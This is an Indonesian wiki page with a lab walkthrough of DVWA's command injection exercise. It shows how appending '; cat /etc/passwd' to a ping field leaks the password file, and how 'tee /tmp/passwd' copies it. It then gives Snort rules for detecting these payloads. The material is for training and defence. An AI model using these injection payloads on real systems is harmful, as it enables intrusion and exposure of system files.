Difference between revisions of "DVWA: Command Injection"

From OnnoWiki
Jump to navigation Jump to search
(Created page with "* Login ke DVWA * Klik Command Injection * Ping isi IP yang bisa di ping misalnya, router anda, misalnya 192.168.0.223 * Hasilnya kira-kira PING 192.168.0.223 (192.168.0....")
 
 
(5 intermediate revisions by the same user not shown)
Line 39: Line 39:
 
  ..
 
  ..
 
  dst
 
  dst
 +
 +
* Lihat source DVWA mengapa melakukan hal itu
 +
 +
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php
 +
 +
 +
* Kalau iseng, coba copy password ke tmp, inject command
 +
 +
192.168.1.106; cat /etc/passwd | tee /tmp/passwd
 +
 +
 +
 +
==Snort Rule==
 +
 +
Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules beberapa alternatif rules berikut
 +
 +
alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;)
 +
alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;)
 +
alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;)
 +
alert tcp any any -> 192.168.0.100 80 (msg:"cat /etc/passwd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;)
 +
alert tcp any any -> 192.168.0.100 80 (msg:"tee /tmp"; content:"tee+%2Ftmp"; nocase; classtype:web-application-attack; sid:1000023;)
 +
 +
apa saat memilih rules, sebaiknya pilih yang paling spesifik, jangan yang general.

Latest revision as of 04:46, 1 April 2017

  • Login ke DVWA
  • Klik Command Injection
  • Ping isi IP yang bisa di ping misalnya, router anda, misalnya
192.168.0.223
  • Hasilnya kira-kira
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms


  • Tambahkan perintah cat sesudah nomor IP, misalnya
192.168.0.223; cat /etc/passwd


PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
..
..
dst
  • Lihat source DVWA mengapa melakukan hal itu
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php


  • Kalau iseng, coba copy password ke tmp, inject command
192.168.1.106; cat /etc/passwd | tee /tmp/passwd


Snort Rule

Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules beberapa alternatif rules berikut

alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;)
alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;)
alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;)
alert tcp any any -> 192.168.0.100 80 (msg:"cat /etc/passwd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;)
alert tcp any any -> 192.168.0.100 80 (msg:"tee /tmp"; content:"tee+%2Ftmp"; nocase; classtype:web-application-attack; sid:1000023;)

apa saat memilih rules, sebaiknya pilih yang paling spesifik, jangan yang general.